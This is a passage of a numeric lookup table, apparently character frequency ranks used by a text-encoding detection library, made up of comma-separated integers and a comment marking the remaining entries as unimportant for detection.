1788, 935, 814,1789,1790,1207, 766, 528,1791,1792,1208,1793,1794,1795,1796,1797,
1403,1798,1799, 533,1059,1404,1405,1156,1406, 936, 884,1080,1800, 351,1801,1802,
1803,1804,1805, 801,1806,1807,1808,1119,1809,1157, 714, 474,1407,1810, 298, 899,
885,1811,1120, 802,1158,1812, 892,1813,1814,1408, 659,1815,1816,1121,1817,1818,
1819,1820,1821,1822, 319,1823, 594, 545,1824, 815, 937,1209,1825,1826, 573,1409,
1022,1827,1210,1828,1829,1830,1831,1832,1833, 556, 722, 807,1122,1060,1834, 697,
1835, 900, 557, 715,1836,1410, 540,1411, 752,1159, 294, 597,1211, 976, 803, 770,
1412,1837,1838, 39, 794,1413, 358,1839, 371, 925,1840, 453, 661, 788, 531, 723,
544,1023,1081, 869, 91,1841, 392, 430, 790, 602,1414, 677,1082, 457,1415,1416,
1842,1843, 475, 327,1024,1417, 795, 121,1844, 733, 403,1418,1845,1846,1847, 300,
119, 711,1212, 627,1848,1272, 207,1849,1850, 796,1213, 382,1851, 519,1852,1083,
893,1853,1854,1855, 367, 809, 487, 671,1856, 663,1857,1858, 956, 471, 306, 857,
1859,1860,1160,1084,1861,1862,1863,1864,1865,1061,1866,1867,1868,1869,1870,1871,
282, 96, 574,1872, 502,1085,1873,1214,1874, 907,1875,1876, 827, 977,1419,1420,
1421, 268,1877,1422,1878,1879,1880, 308,1881, 2, 537,1882,1883,1215,1884,1885,
127, 791,1886,1273,1423,1887, 34, 336, 404, 643,1888, 571, 654, 894, 840,1889,
0, 886,1274, 122, 575, 260, 908, 938,1890,1275, 410, 316,1891,1892, 100,1893,
1894,1123, 48,1161,1124,1025,1895, 633, 901,1276,1896,1897, 115, 816,1898, 317,
1899, 694,1900, 909, 734,1424, 572, 866,1425, 691, 85, 524,1010, 543, 394, 841,
1901,1902,1903,1026,1904,1905,1906,1907,1908,1909, 30, 451, 651, 988, 310,1910,
1911,1426, 810,1216, 93,1912,1913,1277,1217,1914, 858, 759, 45, 58, 181, 610,
269,1915,1916, 131,1062, 551, 443,1000, 821,1427, 957, 895,1086,1917,1918, 375,
1919, 359,1920, 687,1921, 822,1922, 293,1923,1924, 40, 662, 118, 692, 29, 939,
887, 640, 482, 174,1925, 69,1162, 728,1428, 910,1926,1278,1218,1279, 386, 870,
217, 854,1163, 823,1927,1928,1929,1930, 834,1931, 78,1932, 859,1933,1063,1934,
1935,1936,1937, 438,1164, 208, 595,1938,1939,1940,1941,1219,1125,1942, 280, 888,
1429,1430,1220,1431,1943,1944,1945,1946,1947,1280, 150, 510,1432,1948,1949,1950,
1951,1952,1953,1954,1011,1087,1955,1433,1043,1956, 881,1957, 614, 958,1064,1065,
1221,1958, 638,1001, 860, 967, 896,1434, 989, 492, 553,1281,1165,1959,1282,1002,
1283,1222,1960,1961,1962,1963, 36, 383, 228, 753, 247, 454,1964, 876, 678,1965,
1966,1284, 126, 464, 490, 835, 136, 672, 529, 940,1088,1435, 473,1967,1968, 467,
50, 390, 227, 587, 279, 378, 598, 792, 968, 240, 151, 160, 849, 882,1126,1285,
639,1044, 133, 140, 288, 360, 811, 563,1027, 561, 142, 523,1969,1970,1971, 7,
103, 296, 439, 407, 506, 634, 990,1972,1973,1974,1975, 645,1976,1977,1978,1979,
1980,1981, 236,1982,1436,1983,1984,1089, 192, 828, 618, 518,1166, 333,1127,1985,
818,1223,1986,1987,1988,1989,1990,1991,1992,1993, 342,1128,1286, 746, 842,1994,
1995, 560, 223,1287, 98, 8, 189, 650, 978,1288,1996,1437,1997, 17, 345, 250,
423, 277, 234, 512, 226, 97, 289, 42, 167,1998, 201,1999,2000, 843, 836, 824,
532, 338, 783,1090, 182, 576, 436,1438,1439, 527, 500,2001, 947, 889,2002,2003,
2004,2005, 262, 600, 314, 447,2006, 547,2007, 693, 738,1129,2008, 71,1440, 745,
619, 688,2009, 829,2010,2011, 147,2012, 33, 948,2013,2014, 74, 224,2015, 61,
191, 918, 399, 637,2016,1028,1130, 257, 902,2017,2018,2019,2020,2021,2022,2023,
2024,2025,2026, 837,2027,2028,2029,2030, 179, 874, 591, 52, 724, 246,2031,2032,
2033,2034,1167, 969,2035,1289, 630, 605, 911,1091,1168,2036,2037,2038,1441, 912,
2039, 623,2040,2041, 253,1169,1290,2042,1442, 146, 620, 611, 577, 433,2043,1224,
719,1170, 959, 440, 437, 534, 84, 388, 480,1131, 159, 220, 198, 679,2044,1012,
819,1066,1443, 113,1225, 194, 318,1003,1029,2045,2046,2047,2048,1067,2049,2050,
2051,2052,2053, 59, 913, 112,2054, 632,2055, 455, 144, 739,1291,2056, 273, 681,
499,2057, 448,2058,2059, 760,2060,2061, 970, 384, 169, 245,1132,2062,2063, 414,
1444,2064,2065, 41, 235,2066, 157, 252, 877, 568, 919, 789, 580,2067, 725,2068,
2069,1292,2070,2071,1445,2072,1446,2073,2074, 55, 588, 66,1447, 271,1092,2075,
1226,2076, 960,1013, 372,2077,2078,2079,2080,2081,1293,2082,2083,2084,2085, 850,
2086,2087,2088,2089,2090, 186,2091,1068, 180,2092,2093,2094, 109,1227, 522, 606,
2095, 867,1448,1093, 991,1171, 926, 353,1133,2096, 581,2097,2098,2099,1294,1449,
1450,2100, 596,1172,1014,1228,2101,1451,1295,1173,1229,2102,2103,1296,1134,1452,
949,1135,2104,2105,1094,1453,1454,1455,2106,1095,2107,2108,2109,2110,2111,2112,
2113,2114,2115,2116,2117, 804,2118,2119,1230,1231, 805,1456, 405,1136,2120,2121,
2122,2123,2124, 720, 701,1297, 992,1457, 927,1004,2125,2126,2127,2128,2129,2130,
22, 417,2131, 303,2132, 385,2133, 971, 520, 513,2134,1174, 73,1096, 231, 274,
962,1458, 673,2135,1459,2136, 152,1137,2137,2138,2139,2140,1005,1138,1460,1139,
2141,2142,2143,2144, 11, 374, 844,2145, 154,1232, 46,1461,2146, 838, 830, 721,
1233, 106,2147, 90, 428, 462, 578, 566,1175, 352,2148,2149, 538,1234, 124,1298,
2150,1462, 761, 565,2151, 686,2152, 649,2153, 72, 173,2154, 460, 415,2155,1463,
2156,1235, 305,2157,2158,2159,2160,2161,2162, 579,2163,2164,2165,2166,2167, 747,
2168,2169,2170,2171,1464, 669,2172,2173,2174,2175,2176,1465,2177, 23, 530, 285,
2178, 335, 729,2179, 397,2180,2181,2182,1030,2183,2184, 698,2185,2186, 325,2187,
2188, 369,2189, 799,1097,1015, 348,2190,1069, 680,2191, 851,1466,2192,2193, 10,
2194, 613, 424,2195, 979, 108, 449, 589, 27, 172, 81,1031, 80, 774, 281, 350,
1032, 525, 301, 582,1176,2196, 674,1045,2197,2198,1467, 730, 762,2199,2200,2201,
2202,1468,2203, 993,2204,2205, 266,1070, 963,1140,2206,2207,2208, 664,1098, 972,
2209,2210,2211,1177,1469,1470, 871,2212,2213,2214,2215,2216,1471,2217,2218,2219,
2220,2221,2222,2223,2224,2225,2226,2227,1472,1236,2228,2229,2230,2231,2232,2233,
2234,2235,1299,2236,2237, 200,2238, 477, 373,2239,2240, 731, 825, 777,2241,2242,
2243, 521, 486, 548,2244,2245,2246,1473,1300, 53, 549, 137, 875, 76, 158,2247,
1301,1474, 469, 396,1016, 278, 712,2248, 321, 442, 503, 767, 744, 941,1237,1178,
1475,2249, 82, 178,1141,1179, 973,2250,1302,2251, 297,2252,2253, 570,2254,2255,
2256, 18, 450, 206,2257, 290, 292,1142,2258, 511, 162, 99, 346, 164, 735,2259,
1476,1477, 4, 554, 343, 798,1099,2260,1100,2261, 43, 171,1303, 139, 215,2262,
2263, 717, 775,2264,1033, 322, 216,2265, 831,2266, 149,2267,1304,2268,2269, 702,
1238, 135, 845, 347, 309,2270, 484,2271, 878, 655, 238,1006,1478,2272, 67,2273,
295,2274,2275, 461,2276, 478, 942, 412,2277,1034,2278,2279,2280, 265,2281, 541,
2282,2283,2284,2285,2286, 70, 852,1071,2287,2288,2289,2290, 21, 56, 509, 117,
432,2291,2292, 331, 980, 552,1101, 148, 284, 105, 393,1180,1239, 755,2293, 187,
2294,1046,1479,2295, 340,2296, 63,1047, 230,2297,2298,1305, 763,1306, 101, 800,
808, 494,2299,2300,2301, 903,2302, 37,1072, 14, 5,2303, 79, 675,2304, 312,
2305,2306,2307,2308,2309,1480, 6,1307,2310,2311,2312, 1, 470, 35, 24, 229,
2313, 695, 210, 86, 778, 15, 784, 592, 779, 32, 77, 855, 964,2314, 259,2315,
501, 380,2316,2317, 83, 981, 153, 689,1308,1481,1482,1483,2318,2319, 716,1484,
2320,2321,2322,2323,2324,2325,1485,2326,2327, 128, 57, 68, 261,1048, 211, 170,
1240, 31,2328, 51, 435, 742,2329,2330,2331, 635,2332, 264, 456,2333,2334,2335,
425,2336,1486, 143, 507, 263, 943,2337, 363, 920,1487, 256,1488,1102, 243, 601,
1489,2338,2339,2340,2341,2342,2343,2344, 861,2345,2346,2347,2348,2349,2350, 395,
2351,1490,1491, 62, 535, 166, 225,2352,2353, 668, 419,1241, 138, 604, 928,2354,
1181,2355,1492,1493,2356,2357,2358,1143,2359, 696,2360, 387, 307,1309, 682, 476,
2361,2362, 332, 12, 222, 156,2363, 232,2364, 641, 276, 656, 517,1494,1495,1035,
416, 736,1496,2365,1017, 586,2366,2367,2368,1497,2369, 242,2370,2371,2372,1498,
2373, 965, 713,2374,2375,2376,2377, 740, 982,1499, 944,1500,1007,2378,2379,1310,
1501,2380,2381,2382, 785, 329,2383,2384,1502,2385,2386,2387, 932,2388,1503,2389,
2390,2391,2392,1242,2393,2394,2395,2396,2397, 994, 950,2398,2399,2400,2401,1504,
1311,2402,2403,2404,2405,1049, 749,2406,2407, 853, 718,1144,1312,2408,1182,1505,
2409,2410, 255, 516, 479, 564, 550, 214,1506,1507,1313, 413, 239, 444, 339,1145,
1036,1508,1509,1314,1037,1510,1315,2411,1511,2412,2413,2414, 176, 703, 497, 624,
593, 921, 302,2415, 341, 165,1103,1512,2416,1513,2417,2418,2419, 376,2420, 700,
2421,2422,2423, 258, 768,1316,2424,1183,2425, 995, 608,2426,2427,2428,2429, 221,
2430,2431,2432,2433,2434,2435,2436,2437, 195, 323, 726, 188, 897, 983,1317, 377,
644,1050, 879,2438, 452,2439,2440,2441,2442,2443,2444, 914,2445,2446,2447,2448,
915, 489,2449,1514,1184,2450,2451, 515, 64, 427, 495,2452, 583,2453, 483, 485,
1038, 562, 213,1515, 748, 666,2454,2455,2456,2457, 334,2458, 780, 996,1008, 705,
1243,2459,2460,2461,2462,2463, 114,2464, 493,1146, 366, 163,1516, 961,1104,2465,
291,2466,1318,1105,2467,1517, 365,2468, 355, 951,1244,2469,1319,2470, 631,2471,
2472, 218,1320, 364, 320, 756,1518,1519,1321,1520,1322,2473,2474,2475,2476, 997,
2477,2478,2479,2480, 665,1185,2481, 916,1521,2482,2483,2484, 584, 684,2485,2486,
797,2487,1051,1186,2488,2489,2490,1522,2491,2492, 370,2493,1039,1187, 65,2494,
434, 205, 463,1188,2495, 125, 812, 391, 402, 826, 699, 286, 398, 155, 781, 771,
585,2496, 590, 505,1073,2497, 599, 244, 219, 917,1018, 952, 646,1523,2498,1323,
2499,2500, 49, 984, 354, 741,2501, 625,2502,1324,2503,1019, 190, 357, 757, 491,
95, 782, 868,2504,2505,2506,2507,2508,2509, 134,1524,1074, 422,1525, 898,2510,
161,2511,2512,2513,2514, 769,2515,1526,2516,2517, 411,1325,2518, 472,1527,2519,
2520,2521,2522,2523,2524, 985,2525,2526,2527,2528,2529,2530, 764,2531,1245,2532,
2533, 25, 204, 311,2534, 496,2535,1052,2536,2537,2538,2539,2540,2541,2542, 199,
704, 504, 468, 758, 657,1528, 196, 44, 839,1246, 272, 750,2543, 765, 862,2544,
2545,1326,2546, 132, 615, 933,2547, 732,2548,2549,2550,1189,1529,2551, 283,1247,
1053, 607, 929,2552,2553,2554, 930, 183, 872, 616,1040,1147,2555,1148,1020, 441,
249,1075,2556,2557,2558, 466, 743,2559,2560,2561, 92, 514, 426, 420, 526,2562,
2563,2564,2565,2566,2567,2568, 185,2569,2570,2571,2572, 776,1530, 658,2573, 362,
2574, 361, 922,1076, 793,2575,2576,2577,2578,2579,2580,1531, 251,2581,2582,2583,
2584,1532, 54, 612, 237,1327,2585,2586, 275, 408, 647, 111,2587,1533,1106, 465,
3, 458, 9, 38,2588, 107, 110, 890, 209, 26, 737, 498,2589,1534,2590, 431,
202, 88,1535, 356, 287,1107, 660,1149,2591, 381,1536, 986,1150, 445,1248,1151,
974,2592,2593, 846,2594, 446, 953, 184,1249,1250, 727,2595, 923, 193, 883,2596,
2597,2598, 102, 324, 539, 817,2599, 421,1041,2600, 832,2601, 94, 175, 197, 406,
2602, 459,2603,2604,2605,2606,2607, 330, 555,2608,2609,2610, 706,1108, 389,2611,
2612,2613,2614, 233,2615, 833, 558, 931, 954,1251,2616,2617,1537, 546,2618,2619,
1009,2620,2621,2622,1538, 690,1328,2623, 955,2624,1539,2625,2626, 772,2627,2628,
2629,2630,2631, 924, 648, 863, 603,2632,2633, 934,1540, 864, 865,2634, 642,1042,
670,1190,2635,2636,2637,2638, 168,2639, 652, 873, 542,1054,1541,2640,2641,2642, # 512, 256
# Everything below is of no interest for detection purposes
2643,2644,2645,2646,2647,2648,2649,2650,2651,2652,2653,2654,2655,2656,2657,2658,
2659,2660,2661,2662,2663,2664,2665,2666,2667,2668,2669,2670,2671,2672,2673,2674,
2675,2676,2677,2678,2679,2680,2681,2682,2683,2684,2685,2686,2687,2688,2689,2690,
2691,2692,2693,2694,2695,2696,2697,2698,2699,1542, 880,2700,2701,2702,2703,2704,
2705,2706,2707,2708,2709,2710,2711,2712,2713,2714,2715,2716,2717,2718,2719,2720,
2721,2722,2723,2724,2725,1543,2726,2727,2728,2729,2730,2731,2732,1544,2733,2734,
2735,2736,2737,2738,2739,2740,2741,2742,2743,2744,2745,2746,2747,2748,2749,2750,
2751,2752,2753,2754,1545,2755,2756,2757,2758,2759,2760,2761,2762,2763,2764,2765,
2766,1546,2767,1547,2768,2769,2770,2771,2772,2773,2774,2775,2776,2777,2778,2779,
2780,2781,2782,2783,2784,2785,2786,1548,2787,2788,2789,1109,2790,2791,2792,2793,
2794,2795,2796,2797,2798,2799,2800,2801,2802,2803,2804,2805,2806,2807,2808,2809,
2810,2811,2812,1329,2813,2814,2815,2816,2817,2818,2819,2820,2821,2822,2823,2824,
2825,2826,2827,2828,2829,2830,2831,2832,2833,2834,2835,2836,2837,2838,2839,2840,
2841,2842,2843,2844,2845,2846,2847,2848,2849,2850,2851,2852,2853,2854,2855,2856,
1549,2857,2858,2859,2860,1550,2861,2862,1551,2863,2864,2865,2866,2867,2868,2869,
2870,2871,2872,2873,2874,1110,1330,2875,2876,2877,2878,2879,2880,2881,2882,2883,
2884,2885,2886,2887,2888,2889,2890,2891,2892,2893,2894,2895,2896,2897,2898,2899,
2900,2901,2902,2903,2904,2905,2906,2907,2908,2909,2910,2911,2912,2913,2914,2915,
2916,2917,2918,2919,2920,2921,2922,2923,2924,2925,2926,2927,2928,2929,2930,1331,
2931,2932,2933,2934,2935,2936,2937,2938,2939,2940,2941,2942,2943,1552,2944,2945,
2946,2947,2948,2949,2950,2951,2952,2953,2954,2955,2956,2957,2958,2959,2960,2961,
2962,2963,2964,1252,2965,2966,2967,2968,2969,2970,2971,2972,2973,2974,2975,2976,
2977,2978,2979,2980,2981,2982,2983,2984,2985,2986,2987,2988,2989,2990,2991,2992,
2993,2994,2995,2996,2997,2998,2999,3000,3001,3002,3003,3004,3005,3006,3007,3008,
3009,3010,3011,3012,1553,3013,3014,3015,3016,3017,1554,3018,1332,3019,3020,3021,
3022,3023,3024,3025,3026,3027,3028,3029,3030,3031,3032,3033,3034,3035,3036,3037,
3038,3039,3040,3041,3042,3043,3044,3045,3046,3047,3048,3049,3050,1555,3051,3052,
3053,1556,1557,3054,3055,3056,3057,3058,3059,3060,3061,3062,3063,3064,3065,3066,
3067,1558,3068,3069,3070,3071,3072,3073,3074,3075,3076,1559,3077,3078,3079,3080,
3081,3082,3083,1253,3084,3085,3086,3087,3088,3089,3090,3091,3092,3093,3094,3095,
3096,3097,3098,3099,3100,3101,3102,3103,3104,3105,3106,3107,3108,1152,3109,3110,
3111,3112,3113,1560,3114,3115,3116,3117,1111,3118,3119,3120,3121,3122,3123,3124,
3125,3126,3127,3128,3129,3130,3131,3132,3133,3134,3135,3136,3137,3138,3139,3140,
3141,3142,3143,3144,3145,3146,3147,3148,3149,3150,3151,3152,3153,3154,3155,3156,
3157,3158,3159,3160,3161,3162,3163,3164,3165,3166,3167,3168,3169,3170,3171,3172,
3173,3174,3175,3176,1333,3177,3178,3179,3180,3181,3182,3183,3184,3185,3186,3187,
3188,3189,1561,3190,3191,1334,3192,3193,3194,3195,3196,3197,3198,3199,3200,3201,
3202,3203,3204,3205,3206,3207,3208,3209,3210,3211,3212,3213,3214,3215,3216,3217,
3218,3219,3220,3221,3222,3223,3224,3225,3226,3227,3228,3229,3230,3231,3232,3233,
3234,1562,3235,3236,3237,3238,3239,3240,3241,3242,3243,3244,3245,3246,3247,3248,
3249,3250,3251,3252,3253,3254,3255,3256,3257,3258,3259,3260,3261,3262,3263,3264,
3265,3266,3267,3268,3269,3270,3271,3272,3273,3274,3275,3276,3277,1563,3278,3279,
3280,3281,3282,3283,3284,3285,3286,3287,3288,3289,3290,3291,3292,3293,3294,3295,
3296,3297,3298,3299,3300,3301,3302,3303,3304,3305,3306,3307,3308,3309,3310,3311,
3312,3313,3314,3315,3316,3317,3318,3319,3320,3321,3322,3323,3324,3325,3326,3327,
3328,3329,3330,3331,3332,3333,3334,3335,3336,3337,3338,3339,3340,3341,3342,3343,
3344,3345,3346,3347,3348,3349,3350,3351,3352,3353,3354,3355,3356,3357,3358,3359,
3360,3361,3362,3363,3364,1335,3365,3366,3367,3368,3369,3370,3371,3372,3373,3374,
3375,3376,3377,3378,3379,3380,3381,3382,3383,3384,3385,3386,3387,1336,3388,3389,
3390,3391,3392,3393,3394,3395,3396,3397,3398,3399,3400,3401,3402,3403,3404,3405,
3406,3407,3408,3409,3410,3411,3412,3413,3414,1337,3415,3416,3417,3418,3419,1338,
3420,3421,3422,1564,1565,3423,3424,3425,3426,3427,3428,3429,3430,3431,1254,3432,
3433,3434,1339,3435,3436,3437,3438,3439,1566,3440,3441,3442,3443,3444,3445,3446,
3447,3448,3449,3450,3451,3452,3453,3454,1255,3455,3456,3457,3458,3459,1567,1191,
3460,1568,1569,3461,3462,3463,1570,3464,3465,3466,3467,3468,1571,3469,3470,3471,
3472,3473,1572,3474,3475,3476,3477,3478,3479,3480,3481,3482,3483,3484,3485,3486,
1340,3487,3488,3489,3490,3491,3492,1021,3493,3494,3495,3496,3497,3498,1573,3499,
1341,3500,3501,3502,3503,3504,3505,3506,3507,3508,3509,3510,3511,1342,3512,3513,
3514,3515,3516,1574,1343,3517,3518,3519,1575,3520,1576,3521,3522,3523,3524,3525,
3526,3527,3528,3529,3530,3531,3532,3533,3534,3535,3536,3537,3538,3539,3540,3541,
3542,3543,3544,3545,3546,3547,3548,3549,3550,3551,3552,3553,3554,3555,3556,3557,
3558,3559,3560,3561,3562,3563,3564,3565,3566,3567,3568,3569,3570,3571,3572,3573,
3574,3575,3576,3577,3578,3579,3580,1577,3581,3582,1578,3583,3584,3585,3586,3587,
3588,3589,3590,3591,3592,3593,3594,3595,3596,3597,3598,3599,3600,3601,3602,3603,
3604,1579,3605,3606,3607,3608,3609,3610,3611,3612,3613,3614,3615,3616,3617,3618,
3619,3620,3621,3622,3623,3624,3625,3626,3627,3628,3629,1580,3630,3631,1581,3632,
3633,3634,3635,3636,3637,3638,3639,3640,3641,3642,3643,3644,3645,3646,3647,3648,
3649,3650,3651,3652,3653,3654,3655,3656,1582,3657,3658,3659,3660,3661,3662,3663,
3664,3665,3666,3667,3668,3669,3670,3671,3672,3673,3674,3675,3676,3677,3678,3679,
3680,3681,3682,3683,3684,3685,3686,3687,3688,3689,3690,3691,3692,3693,3694,3695,
3696,3697,3698,3699,3700,1192,3701,3702,3703,3704,1256,3705,3706,3707,3708,1583,
1257,3709,3710,3711,3712,3713,3714,3715,3716,1584,3717,3718,3719,3720,3721,3722,
3723,3724,3725,3726,3727,3728,3729,3730,3731,3732,3733,3734,3735,3736,3737,3738,
3739,3740,3741,3742,3743,3744,3745,1344,3746,3747,3748,3749,3750,3751,3752,3753,
3754,3755,3756,1585,3757,3758,3759,3760,3761,3762,3763,3764,3765,3766,1586,3767,
3768,3769,3770,3771,3772,3773,3774,3775,3776,3777,3778,1345,3779,3780,3781,3782,
3783,3784,3785,3786,3787,3788,3789,3790,3791,3792,3793,3794,3795,1346,1587,3796,
3797,1588,3798,3799,3800,3801,3802,3803,3804,3805,3806,1347,3807,3808,3809,3810,
3811,1589,3812,3813,3814,3815,3816,3817,3818,3819,3820,3821,1590,3822,3823,1591,
1348,3824,3825,3826,3827,3828,3829,3830,1592,3831,3832,1593,3833,3834,3835,3836,
3837,3838,3839,3840,3841,3842,3843,3844,1349,3845,3846,3847,3848,3849,3850,3851,
3852,3853,3854,3855,3856,3857,3858,1594,3859,3860,3861,3862,3863,3864,3865,3866,
3867,3868,3869,1595,3870,3871,3872,3873,1596,3874,3875,3876,3877,3878,3879,3880,
3881,3882,3883,3884,3885,3886,1597,3887,3888,3889,3890,3891,3892,3893,3894,3895,
1598,3896,3897,3898,1599,1600,3899,1350,3900,1351,3901,3902,1352,3903,3904,3905,
3906,3907,3908,3909,3910,3911,3912,3913,3914,3915,3916,3917,3918,3919,3920,3921,
3922,3923,3924,1258,3925,3926,3927,3928,3929,3930,3931,1193,3932,1601,3933,3934,
3935,3936,3937,3938,3939,3940,3941,3942,3943,1602,3944,3945,3946,3947,3948,1603,
3949,3950,3951,3952,3953,3954,3955,3956,3957,3958,3959,3960,3961,3962,3963,3964,
3965,1604,3966,3967,3968,3969,3970,3971,3972,3973,3974,3975,3976,3977,1353,3978,
3979,3980,3981,3982,3983,3984,3985,3986,3987,3988,3989,3990,3991,1354,3992,3993,
3994,3995,3996,3997,3998,3999,4000,4001,4002,4003,4004,4005,4006,4007,4008,4009,
4010,4011,4012,4013,4014,4015,4016,4017,4018,4019,4020,4021,4022,4023,1355,4024,
4025,4026,4027,4028,4029,4030,4031,4032,4033,4034,4035,4036,4037,4038,4039,4040,
1605,4041,4042,4043,4044,4045,4046,4047,4048,4049,4050,4051,4052,4053,4054,4055,
4056,4057,4058,4059,4060,1606,4061,4062,4063,4064,1607,4065,4066,4067,4068,4069,
4070,4071,4072,4073,4074,4075,4076,1194,4077,4078,1608,4079,4080,4081,4082,4083,
4084,4085,4086,4087,1609,4088,4089,4090,4091,4092,4093,4094,4095,4096,4097,4098,
4099,4100,4101,4102,4103,4104,4105,4106,4107,4108,1259,4109,4110,4111,4112,4113,
4114,4115,4116,4117,4118,4119,4120,4121,4122,4123,4124,1195,4125,4126,4127,1610,
4128,4129,4130,4131,4132,4133,4134,4135,4136,4137,1356,4138,4139,4140,4141,4142,
4143,4144,1611,4145,4146,4147,4148,4149,4150,4151,4152,4153,4154,4155,4156,4157,
4158,4159,4160,4161,4162,4163,4164,4165,4166,4167,4168,4169,4170,4171,4172,4173,
4174,4175,4176,4177,4178,4179,4180,4181,4182,4183,4184,4185,4186,4187,4188,4189,
4190,4191,4192,4193,4194,4195,4196,4197,4198,4199,4200,4201,4202,4203,4204,4205,
4206,4207,4208,4209,4210,4211,4212,4213,4214,4215,4216,4217,4218,4219,1612,4220,
4221,4222,4223,4224,4225,4226,4227,1357,4228,1613,4229,4230,4231,4232,4233,4234,
4235,4236,4237,4238,4239,4240,4241,4242,4243,1614,4244,4245,4246,4247,4248,4249,
4250,4251,4252,4253,4254,4255,4256,4257,4258,4259,4260,4261,4262,4263,4264,4265,
4266,4267,4268,4269,4270,1196,1358,4271,4272,4273,4274,4275,4276,4277,4278,4279,
4280,4281,4282,4283,4284,4285,4286,4287,1615,4288,4289,4290,4291,4292,4293,4294,
4295,4296,4297,4298,4299,4300,4301,4302,4303,4304,4305,4306,4307,4308,4309,4310,
4311,4312,4313,4314,4315,4316,4317,4318,4319,4320,4321,4322,4323,4324,4325,4326,
4327,4328,4329,4330,4331,4332,4333,4334,1616,4335,4336,4337,4338,4339,4340,4341,
4342,4343,4344,4345,4346,4347,4348,4349,4350,4351,4352,4353,4354,4355,4356,4357,
4358,4359,4360,1617,4361,4362,4363,4364,4365,1618,4366,4367,4368,4369,4370,4371,
4372,4373,4374,4375,4376,4377,4378,4379,4380,4381,4382,4383,4384,4385,4386,4387,
4388,4389,4390,4391,4392,4393,4394,4395,4396,4397,4398,4399,4400,4401,4402,4403,
4404,4405,4406,4407,4408,4409,4410,4411,4412,4413,4414,4415,4416,1619,4417,4418,
4419,4420,4421,4422,4423,4424,4425,1112,4426,4427,4428,4429,4430,1620,4431,4432,
4433,4434,4435,4436,4437,4438,4439,4440,4441,4442,1260,1261,4443,4444,4445,4446,
4447,4448,4449,4450,4451,4452,4453,4454,4455,1359,4456,4457,4458,4459,4460,4461,
4462,4463,4464,4465,1621,4466,4467,4468,4469,4470,4471,4472,4473,4474,4475,4476,
4477,4478,4479,4480,4481,4482,4483,4484,4485,4486,4487,4488,4489,1055,4490,4491,
4492,4493,4494,4495,4496,4497,4498,4499,4500,4501,4502,4503,4504,4505,4506,4507,
4508,4509,4510,4511,4512,4513,4514,4515,4516,4517,4518,1622,4519,4520,4521,1623,
4522,4523,4524,4525,4526,4527,4528,4529,4530,4531,4532,4533,4534,4535,1360,4536,
4537,4538,4539,4540,4541,4542,4543, 975,4544,4545,4546,4547,4548,4549,4550,4551,
4552,4553,4554,4555,4556,4557,4558,4559,4560,4561,4562,4563,4564,4565,4566,4567,
4568,4569,4570,4571,1624,4572,4573,4574,4575,4576,1625,4577,4578,4579,4580,4581,
4582,4583,4584,1626,4585,4586,4587,4588,4589,4590,4591,4592,4593,4594,4595,1627,
4596,4597,4598,4599,4600,4601,4602,4603,4604,4605,4606,4607,4608,4609,4610,4611,
4612,4613,4614,4615,1628,4616,4617,4618,4619,4620,4621,4622,4623,4624,4625,4626,
4627,4628,4629,4630,4631,4632,4633,4634,4635,4636,4637,4638,4639,4640,4641,4642,
4643,4644,4645,4646,4647,4648,4649,1361,4650,4651,4652,4653,4654,4655,4656,4657,
4658,4659,4660,4661,1362,4662,4663,4664,4665,4666,4667,4668,4669,4670,4671,4672,
4673,4674,4675,4676,4677,4678,4679,4680,4681,4682,1629,4683,4684,4685,4686,4687,
1630,4688,4689,4690,4691,1153,4692,4693,4694,1113,4695,4696,4697,4698,4699,4700,
4701,4702,4703,4704,4705,4706,4707,4708,4709,4710,4711,1197,4712,4713,4714,4715,
4716,4717,4718,4719,4720,4721,4722,4723,4724,4725,4726,4727,4728,4729,4730,4731,
4732,4733,4734,4735,1631,4736,1632,4737,4738,4739,4740,4741,4742,4743,4744,1633,
4745,4746,4747,4748,4749,1262,4750,4751,4752,4753,4754,1363,4755,4756,4757,4758,
4759,4760,4761,4762,4763,4764,4765,4766,4767,4768,1634,4769,4770,4771,4772,4773,
4774,4775,4776,4777,4778,1635,4779,4780,4781,4782,4783,4784,4785,4786,4787,4788,
4789,1636,4790,4791,4792,4793,4794,4795,4796,4797,4798,4799,4800,4801,4802,4803,
4804,4805,4806,1637,4807,4808,4809,1638,4810,4811,4812,4813,4814,4815,4816,4817,
4818,1639,4819,4820,4821,4822,4823,4824,4825,4826,4827,4828,4829,4830,4831,4832,
4833,1077,4834,4835,4836,4837,4838,4839,4840,4841,4842,4843,4844,4845,4846,4847,
4848,4849,4850,4851,4852,4853,4854,4855,4856,4857,4858,4859,4860,4861,4862,4863,
4864,4865,4866,4867,4868,4869,4870,4871,4872,4873,4874,4875,4876,4877,4878,4879,
4880,4881,4882,4883,1640,4884,4885,1641,4886,4887,4888,4889,4890,4891,4892,4893,
4894,4895,4896,4897,4898,4899,4900,4901,4902,4903,4904,4905,4906,4907,4908,4909,
4910,4911,1642,4912,4913,4914,1364,4915,4916,4917,4918,4919,4920,4921,4922,4923,
4924,4925,4926,4927,4928,4929,4930,4931,1643,4932,4933,4934,4935,4936,4937,4938,
4939,4940,4941,4942,4943,4944,4945,4946,4947,4948,4949,4950,4951,4952,4953,4954,
4955,4956,4957,4958,4959,4960,4961,4962,4963,4964,4965,4966,4967,4968,4969,4970,
4971,4972,4973,4974,4975,4976,4977,4978,4979,4980,1644,4981,4982,4983,4984,1645,
4985,4986,1646,4987,4988,4989,4990,4991,4992,4993,4994,4995,4996,4997,4998,4999,
5000,5001,5002,5003,5004,5005,1647,5006,1648,5007,5008,5009,5010,5011,5012,1078,
5013,5014,5015,5016,5017,5018,5019,5020,5021,5022,5023,5024,5025,5026,5027,5028,
1365,5029,5030,5031,5032,5033,5034,5035,5036,5037,5038,5039,1649,5040,5041,5042,
5043,5044,5045,1366,5046,5047,5048,5049,5050,5051,5052,5053,5054,5055,1650,5056,
5057,5058,5059,5060,5061,5062,5063,5064,5065,5066,5067,5068,5069,5070,5071,5072,
5073,5074,5075,5076,5077,1651,5078,5079,5080,5081,5082,5083,5084,5085,5086,5087,
5088,5089,5090,5091,5092,5093,5094,5095,5096,5097,5098,5099,5100,5101,5102,5103,
5104,5105,5106,5107,5108,5109,5110,1652,5111,5112,5113,5114,5115,5116,5117,5118,
1367,5119,5120,5121,5122,5123,5124,5125,5126,5127,5128,5129,1653,5130,5131,5132,
5133,5134,5135,5136,5137,5138,5139,5140,5141,5142,5143,5144,5145,5146,5147,5148,
5149,1368,5150,1654,5151,1369,5152,5153,5154,5155,5156,5157,5158,5159,5160,5161,
5162,5163,5164,5165,5166,5167,5168,5169,5170,5171,5172,5173,5174,5175,5176,5177,
